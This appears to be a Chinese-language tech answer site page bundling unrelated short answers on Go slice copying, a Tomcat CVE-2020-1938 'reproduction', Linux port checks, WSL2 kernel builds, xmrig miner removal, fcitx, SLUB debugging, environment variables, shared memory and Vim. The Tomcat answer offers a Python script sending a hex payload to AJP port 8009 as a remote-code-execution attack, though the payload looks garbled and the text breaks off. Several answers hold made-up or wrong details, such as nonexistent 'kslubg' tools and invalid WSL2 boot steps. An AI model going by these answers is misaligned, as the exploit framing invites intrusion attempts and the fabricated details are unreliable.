2024-08-23

在Go语言中,对于Slice和Map类型的数据,直接使用=操作符进行复制时,实际上是进行的浅复制。这意味着新的变量和原始变量指向的是同一个底层数据结构。因此,任何对这些数据结构的修改都会影响到两个变量。

为了避免这个问题,我们需要对Slice和Map类型的数据进行深复制。

解决方案1:使用copy函数复制Slice




originalSlice := []int{1, 2, 3}
copiedSlice := make([]int, len(originalSlice))
copy(copiedSlice, originalSlice)

解决方案2:使用range遍历构造新的Slice




originalSlice := []int{1, 2, 3}
copiedSlice := make([]int, len(originalSlice))
for i, v := range originalSlice {
    copiedSlice[i] = v
}

解决方案3:使用append函数复制Slice




originalSlice := []int{1, 2, 3}
copiedSlice := append([]int(nil), originalSlice...)

解决方案4:使用copy函数复制Map




originalMap := map[string]int{"one": 1, "two": 2}
copiedMap := make(map[string]int)
for k, v := range originalMap {
    copiedMap[k] = v
}

解决方案5:使用json.Marshaljson.Unmarshal进行深度复制




import (
    "encoding/json"
)
 
originalMap := map[string]int{"one": 1, "two": 2}
copiedMap := make(map[string]int)
 
data, _ := json.Marshal(originalMap)
json.Unmarshal(data, &copiedMap)

注意:使用json.Marshaljson.Unmarshal进行深度复制时,需要注意的是,如果Map中包含有函数、循环引用或者无法序列化的值时,会导致错误。此外,这种方法也无法复制无法序列化的字段。

2024-08-23

Tomcat是一个开源的Java Servlet容器,用于通过Java Servlet和JavaServer Pages技术提供Web服务。Tomcat由Apache软件基金会开发,是最受欢迎的Java Servlet容器之一。

复现Tomcat漏洞通常涉及到使用特定的工具或代码来模拟漏洞的攻击。由于Tomcat漏洞种类繁多,没有具体到某一个漏洞,我将提供一个常见的Tomcat RCE(远程代码执行)漏洞的复现方法。

假设我们要复现CVE-2020-1938 Tomcat AJP2 NUL执行漏洞,以下是一个简化的攻击示例:

  1. 确保你有一个运行的Tomcat服务器,并且有AJP2连接器(Connector)开启。
  2. 使用以下Python代码发送恶意构造的数据包来尝试远程执行代码:



import socket
 
# Tomcat服务器的IP和端口
server_ip = "127.0.0.1"
server_port = 8009  # AJP端口,Tomcat默认为8009
 
# 构造AJP包的payload
payload = (
    b'\x13\x03\x00\x02\x0b\x50\x65\x72\x69\x73\x74\x6f\x72\x2e\x43\x6f\x6e\x74\x65\x6e\x74\x53\x74\x72\x65\x61\x6d\x04\x00\x0f\x4c\x6a\x61\x76\x61\x2e\x6c\x61\x6e\x67\x2e\x53\x74\x72\x69\x6e\x67\x3b\x4c\x6a\x61\x76\x61\x2e\x6c\x61\x6e\x67\x2e\x53\x74\x72\x69\x6e\x67\x12\x37\x04\x37\x2e\x33\x30\x2e\x34\x32\x2e\x31\x32\x37\x33\x2e\x31\x32\x38\x33\x2e\x31\x33\x37\x2e\x43\x6f\x6e\x74\x65\x6e\x74\x53\x74\x72\x69\x6e\x67\x01\x00\x03\x6f\x70\x74\x01\x00\x0e\x74\x6f\x5f\x6e\x75\x6d\x42\x79\x74\x65\x5f\x64\x61\x74\x61\x04\x00\x00\x00\x00\x01\x00\x04\x6f\x70\x65\x72\x73'
)
 
# 创建socket连接
sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
sock.connect((server_ip, server_port))
 
# 发送AJP包
sock.send(payload)
 
# 接收响应
response = sock.recv(1024)
 
print(response)

请注意,实际的攻击可能涉及到特定的漏洞利用工具或

2024-08-23

在Linux中,可以使用netstatss命令查看防火墙对外开放的端口。

使用netstat命令查看开放端口:




netstat -tuln

使用ss命令查看开放端口:




ss -tuln

这两个命令的参数说明:

  • -t 表示显示TCP端口。
  • -u 表示显示UDP端口。
  • -l 表示显示正在监听的端口。
  • -n 表示不解析服务名称(使用端口号显示)。

如果需要查看特定的端口是否开放,可以使用grep命令过滤,例如查看端口80是否开放:




ss -tuln | grep :80

或者




netstat -tuln | grep :80

如果系统中没有netstat,可以通过安装net-tools包来获取它,对于ss通常是默认安装的。

2024-08-23

在Windows上使用WSL2编译Linux内核并替换WSL2的内核版本涉及以下步骤:

  1. 准备编译环境:确保WSL2已经安装并配置好。
  2. 下载Linux内核源代码:从官方网站下载所需版本的内核源码。
  3. 配置内核:根据需求配置内核选项。
  4. 编译内核:使用make命令编译内核。
  5. 生成内核模块:使用make modules命令编译内核模块。
  6. 安装内核模块:使用make modules_install命令安装编译好的内核模块。
  7. 安装内核:使用make install命令安装编译好的内核。
  8. 更新Grub配置:更新GRUB配置以包含新内核。
  9. 重启并选择新内核:重启WSL2,并选择新安装的内核启动。

以下是一个简化的示例步骤,用于编译和安装Linux内核:




# 1. 下载内核源码
wget https://cdn.kernel.org/pub/linux/kernel/v5.x/linux-5.10.17.tar.xz
tar -xvf linux-5.10.17.tar.xz
cd linux-5.10.17
 
# 2. 配置内核(这里使用默认配置)
make defconfig
 
# 3. 编译内核
make -j $(nproc)
 
# 4. 编译并安装内核模块
make modules -j $(nproc)
make modules_install
 
# 5. 安装内核
make install
 
# 6. 更新Grub(这一步在WSL2中可能不需要,因为它使用的是Linux的GRUB而非Windows的Boot Manager)
update-grub
 
# 7. 重启
wsl --shutdown

重启后,在WSL2的启动菜单中选择新安装的内核版本。请注意,这个过程可能会影响到WSL2的稳定性和兼容性,因此不建议在没有充分理解风险的情况下进行。如果你不熟悉Linux内核编译和WSL2的工作原理,建议寻求有经验的技术人员协助。

2024-08-23

清理xmrig挖矿病毒的步骤如下:

  1. 杀掉相关进程:



sudo killall xmrig
  1. 删除病毒文件:



sudo rm -f /var/tmp/xmrig
sudo rm -f /var/tmp/update-motd
sudo rm -f /var/tmp/systemd-private-*xmrig*
  1. 删除可能被病毒修改的系统文件(如果存在):



sudo rm -f /etc/update-motd.d/10-xmrig
  1. 检查并删除后门文件:



sudo find / -name .xmrig_miner_downloader 2>/dev/null
sudo find / -name .xmrig_miner_downloader 2>/dev/null | xargs sudo rm -rf
  1. 检查并删除病毒创建的其他文件:



sudo find / -name xmrig 2>/dev/null
sudo find / -name xmrig 2>/dev/null | xargs sudo rm -rf
  1. 清理系统日志中的相关条目:



sudo journalctl --rotate
sudo journalctl --vacuum-size=1G
  1. 更新系统包列表并清理无用包:



sudo apt-get update
sudo apt-get autoremove
  1. 重新安装受影响的服务(如果有):



sudo systemctl restart 受影响的服务名

请注意,这些命令应在具有相应权限的用户下执行,通常是root用户或具有sudo权限的用户。在执行删除操作前,请确保备份重要数据,并确认每个命令的作用。如果不确定,请咨询专业人士。

2024-08-23

在Linux系统中,如果你使用的是fcitx输入法框架,并遇到输入中文标点时自动变成半角(英文)标点符号的问题,这通常是由于输入法的配置不正确导致的。

解决方法:

  1. 打开fcitx配置工具。
  2. 进入“输入法配置”选项,找到你当前使用的输入法(如“智能拼音”)。
  3. 在输入法配置页面中,找到“按键映射”或者“快捷键”设置。
  4. 在按键映射中,找到中文标点的快捷键,并将其设置为正确的中文标点符号。
  5. 如果找不到快捷键设置,可以尝试在输入法管理器中直接输入中文标点,看是否能够识别并切换到中文标点模式。
  6. 如果上述步骤无效,可以考虑重新安装fcitx输入法或查看相关论坛和文档获取更多帮助。

以下是一个示例步骤,用于配置fcitx中文标点快捷键:




# 打开fcitx配置工具
fcitx-config-gtk3
 
# 进入输入法配置界面,找到智能拼音输入法
# 进入按键映射或快捷键设置
# 设置中文标点的快捷键,例如:
# 全角/半角切换: Shift+Space
# 句子结束:Enter
# 句子中间断行:Shift+Enter

确保在配置中文标点快捷键时,不要与现有的输入法快捷键冲突。如果不熟悉如何操作,可以查看输入法的帮助文档或使用默认设置。如果问题依旧存在,可能需要更新fcitx到最新版本或寻求官方支持。

2024-08-23

在Linux内核中,SLUB是一种内存分配器,用于分配小型的、高速的内存块。SLUB debug功能可以帮助开发者检测内存泄漏。

以下是一个如何使用SLUB debug特性来检测内存泄漏的例子:

  1. 启用SLUB debug特性:

    在内核引导时,可以通过添加slub_debug=<options>到启动参数中来启用SLUB debug特性。例如:

    
    
    
    bootargs="... slub_debug=UA"

    其中UA代表的选项是:"U" for unquiescent scanning, "A" for auditing.

  2. 使用slabtop命令监控内存使用情况:

    启用SLUB debug后,可以使用slabtop命令实时监控各个slab的使用情况。

  3. 使用kslubg工具分析内存泄漏:

    kslabg是一个内存泄漏分析工具,它可以帮助你找到内存泄漏的位置。

  4. 使用kmemleak检测内存泄漏:

    kmemleak是一个更高级的内存泄漏检测工具,它可以帮助你自动发现和定位内存泄漏。

请注意,启用SLUB debug会增加额外的开销,可能会影响系统性能。因此,这些特性应该只在开发和测试阶段使用。

2024-08-23

在Linux中设置和获取环境变量的方法如下:

  1. 设置环境变量:

临时设置环境变量(当前会话有效):




export VAR_NAME="value"

永久设置环境变量,将上述命令添加到用户的.bashrc.bash_profile.profile文件中,然后执行source ~/.bashrc或重新登录。

  1. 获取环境变量:

使用echo获取并显示环境变量的值:




echo $VAR_NAME

使用printenv命令列出所有环境变量或获取特定变量的值:




printenv VAR_NAME
  1. 删除环境变量:



unset VAR_NAME

例如,设置一个名为MY_VAR的环境变量:




export MY_VAR="Hello, World!"

获取并显示这个环境变量:




echo $MY_VAR

如果想要永久设置这个变量,在用户的.bashrc或相应的配置文件中添加:




export MY_VAR="Hello, World!"

然后执行source ~/.bashrc或重新登录。

2024-08-23



#include <stdio.h>
#include <stdlib.h>
#include <sys/types.h>
#include <sys/ipc.h>
#include <sys/shm.h>
#include <string.h>
 
#define SHM_SIZE 1024
 
int main() {
    key_t key = ftok("shmkey", 65); // 生成key
    int shmid = shmget(key, SHM_SIZE, IPC_CREAT | 0666); // 创建共享内存
    if (shmid < 0) {
        perror("shmget");
        exit(1);
    }
 
    char *shmaddr = (char *)shmat(shmid, NULL, 0); // 连接共享内存
    if ((int)shmaddr == -1) {
        perror("shmat");
        exit(1);
    }
 
    // 写入数据
    strcpy(shmaddr, "Hello, shared memory!");
 
    // 等待其他进程读取数据
    printf("Waiting for other process to read the data...\n");
    sleep(10);
 
    // 断开共享内存连接
    if (shmdt(shmaddr) < 0) {
        perror("shmdt");
        exit(1);
    }
 
    // 删除共享内存
    shmctl(shmid, IPC_RMID, NULL);
 
    return 0;
}

这段代码展示了如何使用System V共享内存进行进程间通信。首先,我们通过ftok函数生成一个key,然后使用shmget创建一个共享内存段。接着,使用shmat函数将这个段连接到我们的地址空间,并写入数据。最后,我们等待其他进程读取数据,并使用shmdt断开连接,在等待一段时间后,通过shmctl删除共享内存。

2024-08-23

在 Vim 中显示行号,您可以使用以下命令:

  1. 普通模式下输入 :set number 或简写为 :set nu 来显示行号。
  2. 如果您想让 Vim 永久显示行号,可以将 set number 添加到您的 Vim 配置文件 ~/.vimrc 中。

例如,在 ~/.vimrc 文件中添加以下内容以启用行号:




set number

之后,每次启动 Vim 时都会自动显示行号。

如果您想临时关闭行号,可以使用 :set nonumber 或简写为 :set nonu 命令。 若要切换行号的显示(即开启时关闭,关闭时开启),可以使用 :set number! 命令。